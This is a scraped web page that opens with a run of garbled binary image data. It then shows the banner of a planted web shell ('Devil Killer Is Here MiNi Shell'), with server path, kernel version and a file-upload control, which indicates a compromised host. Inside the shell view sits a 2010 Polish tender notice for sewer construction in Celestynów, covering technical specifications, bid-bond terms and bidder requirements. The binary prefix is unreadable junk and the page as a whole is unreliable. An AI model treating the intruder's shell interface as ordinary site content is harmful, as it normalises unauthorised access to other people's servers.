JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100218/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100218/34209-N-2010.html

<p class="kh_header"><b>Celestynów: na budowę kanalizacji sanitarnej w Celestynowie, ul. Leśna, Wiosenna, Podgórna, Laskowska, Regucka - zadanie IX w Celestynowie - zadanie IX</b><br>
<b>Numer ogłoszenia: 34209 - 2010; data zamieszczenia: 18.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Celestynów , ul. Regucka 3, 05-430 Celestynów, woj. mazowieckie, tel. 022 7897060 w. 119; 7897060, faks 022 7897011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.celestynow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> na budowę kanalizacji sanitarnej w Celestynowie, ul. Leśna, Wiosenna, Podgórna, Laskowska, Regucka - zadanie IX w Celestynowie - zadanie IX.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy zamówienia:
a)	Budowę sieci kanalizacyjnej wraz ze studniami zaworowymi oraz odcinkami kanalizacji do granicy nieruchomości od studni zaworowej
b)	Budowę przewodu tłocznego kanalizacji sanitarnej
c)	Monitoring sieci podciśnieniowej
d)	Roboty związane z odtworzeniem nawierzchni dróg po kanalizacji
	Budowa sieci kanalizacyjnej podciśnieniowej z rur PE wraz ze studniami oraz odcinkami kanalizacji do granicy nieruchomości obejmuje:
1.	Ułożenie przewodu D160/9,5 o łącznej długości 598 m
2.	Ułożenie przewodu D110/6,6 o łącznej długości 1626 m
3.	Ułożenie przewodu D90/5,4  o łącznej długości 1587m
4.	Montaż 65 studni zaworowych oraz jednej studni dwu zaworowej
Studnie zaworowe
		Jako studnie zaworowe zastosować należy studnie z tworzywa sztucznego lub betonowe o średnicy 1000 mm wyposażone w stopnie złazowe. Komory zaworowe muszą być oddzielone, w szczelny sposób, od komór ściekowych, dzięki czemu zawory podciśnieniowe są czyste, suche i higieniczne. Studzienka z zaworem podciśnieniowym musi być szczelna i uniemożliwiać infiltracje wód gruntowych oraz dopływ wód deszczowych. Napowietrzenie zaworu podciśnieniowego musi być wyprowadzone na zewnątrz studzienki. Dodatkowo na grawitacyjnym dopływie ścieków musi być zainstalowane napowietrzenie umożliwiające doprowadzenie do systemu powietrza o ciśnieniu atmosferycznym niezbędne do transportu ścieków. Obydwa elementy dopływu powietrza winne być zabezpieczone i zainstalowane z dala od miejsc ruchu pieszego/kołowego. W studniach należy zamontować zawór opróżniający 3 z osprzętem i sterownikiem. Zapewni to bezproblemowe usunięcie elementów stałych, o większych rozmiarach i uniemożliwi blokadę zaworu. Powinna zostać zabezpieczona możliwość usunięcia z komory ściekowej studzienki zanieczyszczeń o większej średnicy bez konieczności demontażu studzienki, z zewnątrz, np.: przy pomocy specjalnej lancy ssawnej Studzienka zbiorcza musi posiadać przyłącze do usuwania ścieków w nagłych przypadkach, oddzielone przy pomocy prostego zaworu kulowego o działaniu zwrotnym. Takie rozwiązanie umożliwia operatorowi odessanie ścieków z komory ściekowej do poziomu, zapewniającego bezpieczne otwarcie zamknięcia inspekcyjnego bez ryzyka przedostania się ścieków do komory zaworowej. Studzienka podciśnieniowa musi posiadać trójnik serwisowy wraz z korkiem, zamontowany na dolocie podciśnienia, umożliwiający wyłączenie 1 studzienki, zaworu podciśnieniowego w celu jego obsługi, lub podczas montażu. Nie dopuszcza się zastosowania rozwiązania zmuszającego do odłączenia więcej niż 1 studzienki dla przyprowadzania w.w prac. Konstrukcja studzienki powinna zabezpieczać rurę sensorową przed możliwością zapychania. Połączenie rury odsysającej ścieki z komory ściekowej studzienki i rury sensorowej musi zapewniać efekt samooczyszczania wlotu rury sensorowej.
Montaż zaworów podciśnieniowych w studniach zaworowych wraz z urządzeniami do monitoringu
Przeprowadzenie próby szczelności całej sieci
Zawory podciśnieniowe
		Zawór o średnicy nominalnej 3 musi umożliwiać swobodne przejście kuli o średnicy 75 mm. Zapewni to bezproblemowe usunięcie elementów stałych, o większych rozmiarach i uniemożliwi blokadę zaworu. Podciśnieniowy zestaw zaworowy musi być zdolny do pracy w stanie zatopienia przy założeniu podłączenia zaworu do linii napowietrzania, która zapewnia mu stały dopływ powietrza o ciśnieniu atmosferycznym. Zawór powinien być dostosowany do montażu w studzienkach wyposażonych w odrębny zbiornik ścieków. Podciśnieniowy zawór opróżniający łączy się końcówkami sieci, wprowadzonymi do studni, za pomocą złączek gumowych. Złączki dostarczane są zawsze razem z 2 szt. opasek samozaciskowych oraz w 2 szt. standardowych opasek zaciskowych, które należy zamocować w momencie montażu. Kształtki połączeniowe muszą umożliwiać szybką wymianę zaworu lub układu sterowania. Sterownik jest aktywowany tylko gdy wartość podciśnienia w układzie przekroczy wartość ok. 0,22 bar. W przypadku konieczności zmian ustawień sterownika np. podczas uruchamiania systemu, jego rozbudowy lub podłączania nowych domów prace te muszą być dokonywane wyłącznie po konsultacji z uprawnionymi pracownikami producenta. Zamawiający wymaga by producent urządzeń kanalizacji podciśnieniowej posiadał niezbędne atesty  i certyfikaty w tym certyfikat systemu zarządzania jakością ISO 9001.

Budowa przewodu tłocznego z rur PE
1.	Ułożenie przewodu D90/5,4  o łącznej długości 1858 m
2.	Wykonanie studni rewizyjnych  o średnicy 1600 mm 5szt.
3.	Przeprowadzenie próby szczelności przewodu tłocznego

Monitoring sieci podciśnieniowej
	Wykonanie systemu powiadamiania o pracy zaworów podciśnieniowych drogą kablową do pompowni podciśnieniowej z możliwością przesłania informacji do centralnej dyspozytorni. Monitoring należy włączyć do istniejącej sieci monitoringu w tym celu należy rozbudować system monitoringu w szafie sterowniczej pompowni do potrzeb przedmiotowej inwestycji (robotę ta należy uwzględnić w cenie oferty).

Roboty związane z odtworzeniem nawierzchni dróg po kanalizacji
	Zakres robót związanych z odtworzeniem nawierzchni drogowych przedstawia przedmiar robót na kanalizacje podciśnieniową. Dotyczy to dróg wykonanych z nawierzchni bitumicznej i kostki brukowej           (w tym chodniki). Drogi objęte inwestycją (bitumiczne, gruntowe, z kostki brukowej) Wykonawca odtworzy do stanu pierwotnego jak przed rozpoczęciem robót budowlanych. Przed wejściem na budowę Wykonawca zobowiązany będzie do spisania protokołu zawierającego opis stanu nawierzchni każdej drogi objętej inwestycją. 
W ramach zamówienia Wykonawca zobowiązany będzie do: 
1.	Urządzenia terenu budowy,
2.	Zapewnienia obsługi geodezyjnej mającej na celu wytyczenie oraz bieżącą inwentaryzację powykonawczą,
3.	Zapewnienia dostępu do posesji podczas budowy oraz zapewnienie obsługi komunikacyjnej,
4.	Wykonawca zawiadomi na piśmie o terminie rozpoczęcia robót zarządcę dróg, właścicieli i zarządców sieci elektroenergetycznej, gazowej, telekomunikacyjnej, wodnej.
5.	Bieżącego usuwania materiałów, odpadów i śmieci z miejsca budowy,
6.	Na Wykonawcy spoczywa odpowiedzialność za ochronę przekazanych mu punków pomiarowych od chwili przekazania mu terenu budowy przez Zamawiającego do chwili odbioru ostatecznego robót budowlanych. Uszkodzone lub zniszczone znaki geodezyjne Wykonawca odtworzy i poprawi na własny koszt.
7.	Wykonawca zdobędzie w imieniu Zamawiającego projekt czasowej organizacji ruchu uzgodniony z zarządcą drogi oraz decyzję na zajęcie pasa drogowego, jeżeli przepisy prawa nie stanowią inaczej oraz poniesie koszty organizacji ruchu.
8.	Wykonawca zobowiązany jest do zabezpieczenia i oznakowania terenu robót zgodnie z obowiązującymi w tym zakresie instrukcjami i przepisami prawa oraz uporządkowania terenu po zakończeniu robót. W miejscach przylegających do dróg otwartych dla ruchu, Wykonawca wyraźnie oznakuje teren robót budowlanych w okresie trwania realizacji inwestycji, aż do zakończenia i odbioru ostatecznego robót. Wykonawca ponosi koszty urządzenia terenu budowy oraz ponoszenia kosztów zużycia wody, energii i innych mediów.
9.	Wykonawca będzie odpowiadać w szczególności za wszelkie spowodowane przez jego działania uszkodzenia instalacji na powierzchni ziemi i urządzeń podziemnych, a szkody wyrządzone podczas realizacji inwestycji Wykonawca zobowiązany jest naprawić niezwłocznie na własny koszt.
10.	Wykonawca odpowiada za wszelkie szkody wyrządzone osobom trzecim w trakcie realizacji robót objętych niniejsza Umową oraz za szkody wynikające z wadliwego wykonania robót, ujawnione w okresie gwarancji jakości. 
11.	Wykonawca zawiadomi właścicieli lub użytkowników nieruchomości przyległych do terenu budowy co najmniej z 2 dwudniowym wyprzedzeniem o ewentualnym braku możliwości dojazdu do tych nieruchomości i czasie ich trwania. Każdorazowo w przypadku powstania na skutek braku powiadomienia -  szkody po stronie właścicieli lub użytkowników nieruchomości, Wykonawca zobowiązany będzie do jej naprawienia na swój koszt.
12.	Zgłoszenia inwestycji do odbioru wpisem do dziennika budowy, uczestniczenie w odbiorach i usunięcie  wad oraz sporządzanie i podpisywanie protokołów odbiorów częściowych i końcowego robót budowlanych, podpisywanie protokołów potwierdzających wykonanie prób, rozruchów lub odbiorów technicznych maszyn i urządzeń, protokołów z badań, pomiarów.
13.	Powiadamiania Zamawiającego i inspektorów nadzoru inwestorskiego o konieczności wykonania zamówień dodatkowych nieprzewidzianych w umowie o wykonanie robót budowlanych, niezbędnych do wykonania ze względu na bezpieczeństwo lub zabezpieczenie przed awarią.
14.	Wykonawca zobowiązany będzie do udziału w przeglądach gwarancyjnych wynikających z umowy (okres gwarancji na wykonane roboty budowlane będzie wynosił 36 miesięcy). Do dnia upływu terminu gwarancji jakości Wykonawca powinien być dostępny na każde wezwanie Zamawiającego.
15.	Wykonawca uporządkuje placu budowy po zakończeniu robót i przekaże go Zamawiającemu najpóźniej do dnia odbioru ostatecznego.
16. Wykonawca przygotuje i przekaże Zamawiającemu 3 egzemplarze kompletnej dokumentacji powykonawczej zgodnie z przepisami ustawy Prawo budowlane.
17. Materiały i urządzenia użyte do wykonania zamówienia muszą posiadać świadectwa jakości, atesty, certyfikaty, karty gwarancyjne i powinny odpowiadać Polskim Normom, wytycznym zawartym w dokumentach oraz wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie zgodnie z obowiązującymi w tym zakresie przepisami prawa.
18. Wykonawca przedstawi Zamawiającemu w dniu podpisania umowy kompletny harmonogram finansowo - rzeczowy. 
19. Wykonawca zdobędzie w imieniu Zamawiającego zatwierdzone zgłoszenie do użytkowania. 
20. Wykonawca udzieli Zamawiającemu gwarancji na wykonane roboty. Okres gwarancji ustala się na 36 miesięcy, licząc od daty podpisania bezusterkowego protokołu odbioru końcowego. W okresie gwarancji i rękojmi Wykonawca obowiązany jest do nieodpłatnego usuwania stwierdzonych wad wynikających z nienależytego wykonania robót.
21. Wykonawca dostarczy przed podpisaniem umowy z Zamawiającym kompletny kosztorys odpowiadający kwocie ryczałtowej przedstawionej w Formularzu ofertowym -Załącznik nr 1. 
22. Szczegółowy zakres robót określają projekty budowlano - wykonawcze, specyfikacje techniczne wykonania i odbioru robót budowlanych, przedmiary robót oraz postanowienia Specyfikacji Istotnych Warunków Zamówienia
Dokumentacja projektowa kanalizacji podciśnieniowej dostępna jest w siedzibie Zamawiającego tj. Urząd Gminy Celestynów, ul. Regucka 3, 05-430 Celestynów pok. nr 35 oraz nr 34..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.10-9, 45.11.12.00-0, 45.23.11.00-6, 45.23.11.10-9, 45.23.11.11-6, 45.23.21.00-3, 45.23.13.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda składana oferta musi być zabezpieczona wadium w wysokości: 70.000,00 zł (słownie: siedemdziesiąt tysięcy złotych) ważnym w okresie związania ofertą.
8.2.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania oferty, a dowód wniesienia wadium (kserokopia poświadczona za zgodność z oryginałem) powinien załączyć do oferty wraz z informacją, na jaki numer konta należy zwrócić wadium oraz danymi osoby do kontaktu w tej sprawie.
8.3.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
a) 	pieniądzu;
b) 	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) 	gwarancjach bankowych;
d) 	gwarancjach ubezpieczeniowych;
e) 	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 09 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r., Nr 42, poz. 275, ze zm.)
8.4.	Wadium wnoszone w formie określonej w pkt 8.3 lit. a - e SIWZ powinno być utrzymane lub obowiązywać przez cały okres związania ofertą.
8.5.	Wadium wnoszone w formie pieniężnej należy wpłacić na rachunek bankowy o numerze: 23 8001 0005 2002 0008 6091 0012, prowadzone przez: Bank Spółdzielczy w Otwocku oddział w Celestynowie, z następującą adnotacją: budowa kanalizacji sanitarnej w Celestynowie - zadanie IX. Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania wpłaty na rachunku bankowym Zamawiającego.
8.6.	Wadium wnoszone w innej formie niż pieniężna Wykonawca złoży w Celestynowie przy ul. Reguckiej 3, Biurze Obsługi Mieszkańca - Urzędu Gminy w Celestynowie lub dołączy do oferty.
8.7.	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być zawierać następujące elementy:
1) 	nazwę dającego zlecenie (Wykonawcy), beneficjanta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczającej udzielającej gwarancji) oraz wskazanie ich siedzib,
2) 	określenie wierzytelności, która ma być zabezpieczona gwarancją,
3) 	kwotę gwarancji - gwarancje ubezpieczeniowe, gwarancje bankowe oraz poręczenia złożone jako zabezpieczenie wniesienia wadium muszą obejmować okres ważności adekwatny do okresu związania ofertą  tj. 30 dni,
4) 	termin ważności gwarancji.
8.8.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Pzp.
8.9.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
8.10.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
8.11.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
8.12. Jeżeli wadium wniesione zostanie w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
8.13.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) 	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b) 	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c) 	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8.14.	Zamawiający zatrzymuje również wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie do złożenia niezbędnych dokumentów lub oświadczeń, nie złoży przedmiotowych dokumentów lub oświadczeń, pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
8.15.	Jeżeli Wykonawca nie wniesie wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzi się na przedłużenie okresu związania ofertą, to wówczas zostanie wykluczony z postępowania o udzielenie zamówienia publicznego w trybie przepisu art. 24 ust. 2 pkt 2 Pzp.
8.16.	W przypadku wniesienia wadium w pieniądzu może ono zostać zaliczone na poczet zabezpieczenia należytego wykonania umowy za zgodą Wykonawcy, którego oferta została wybrana.
W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia wadium wnoszone w formach określonych w pkt. 8.3. lit. od b do e SIWZ musi obejmować swym zakresem związane z postępowaniem działania lub zaniechania każdego z Wykonawców wspólnie ubiegającego się o udzielenie zamówienia.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania (art. 22 ust. 1 pkt 1 Ustawy);
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w niniejszej SIWZ) dołączonych do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót, których przedmiotem była budowa kanalizacji podciśnieniowe oraz tłocznej o łącznej długości nie mniejszej niż 5.669,00 m., oraz potwierdzenia, że roboty te zostały wykonane należycie. W celu potwierdzenia spełniania powyższego warunku Wykonawca zobowiązany jest przedłożyć wykaz wykonanych robót budowlanych sporządzony według wzoru stanowiącego Załącznik nr 4 do oferty oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w niniejszej SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania narzędziami i urządzeniami technicznymi w celu realizacji zamówienia, w tym w szczególności dysponowania: koparką, spycharką, niwelatorem, ubijakami - minimum 2 sztuki, płytami i walcami wibracyjnymi - minimum 2 sztuki, maszyną do przewiertów, maszyną do zgrzewania rur - minimum 2 sztuki, sprężarką, piłą spalinową do ciecia nawierzchni. W celu potwierdzenia spełniania powyższego warunku Wykonawca zobowiązany jest przedłożyć wykaz sporządzony według wzoru stanowiącego Załącznik nr 6 do oferty. Wykaz winien zawierać szczegółowe informacje na temat narzędzi i urządzeń technicznych, którymi dysponuje Wykonawca, wraz ze wskazaniem podstawy dysponowania tymi zasobami.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w niniejszej SIWZ) dołączonych do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	Dysponowania osobą, która będzie uczestniczyć w wykonaniu zamówienia posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń, lub inne, ważne, uprawnienia budowlane uprawniające do pełnienia funkcji kierownika budowy w zakresie obejmującym przedmiot zamówienia, które zostały wydane na podstawie obowiązujących przepisów. 
- Dysponowania osobą, która będzie uczestniczyć w wykonaniu zamówienia posiadającą uprawnienia do kierowania robotami sanitarnymi - osoba posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub inne uprawnienia budowlane uprawniające do pełnienia funkcji kierownika robót sanitarnych w zakresie obejmującym przedmiot zamówienia, które zostały wydane na podstawie obowiązujących przepisów.
- Dysponowania osobą, która będzie uczestniczyć w wykonaniu zamówienia posiadająca uprawnienia do kierowania robotami elektrycznymi - kierownik robót elektrycznych, posiadający uprawnienia budowlane w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub inne uprawnienia budowlane uprawniające do pełnienia funkcji kierownika robót elektrycznych w zakresie obejmującym przedmiot zamówienia, które zostały wydane na podstawie obowiązujących przepisów.
Wykonawca zobowiązany jest przedłożyć wykaz sporządzony według wzoru stanowiącego Załącznik nr 5 do oferty. Wykaz winien zawierać szczegółowe informacje na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, zakresu wykonywanych przez nie czynności, wraz ze wskazaniem podstawy do dysponowania tymi osobami. 
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w niniejszej SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedstawią polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej co najmniej przez okres wykonywania zamówienia, na kwotę nie mniejszą niż 3.900.000 zł.  Wykonawca zobowiązany będzie do przedłużenia terminu polisy do końca wykonywania zamówienia. W przypadku gdy polisa wygaśnie w trakcie wykonywania zamówienia  Wykonawca przedstawi Zamawiającemu oryginał podpisanej na nowy okres umowy na ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Nie przedłużenia okresu ważności polisy będzie stanowiło podstawę do odstąpienia od umowy z winy Wykonawcy. Polisa lub inny dokument świadczący o posiadaniu przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej. Polisa  powinna być ważna w dniu składania ofert.
Posiadają środki  finansowe w wysokości minimum 3.900.000  zł lub zdolność kredytową na kwotę minimum 3.900.000 zł.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w niniejszej SIWZ) dołączonych do oferty.</p>
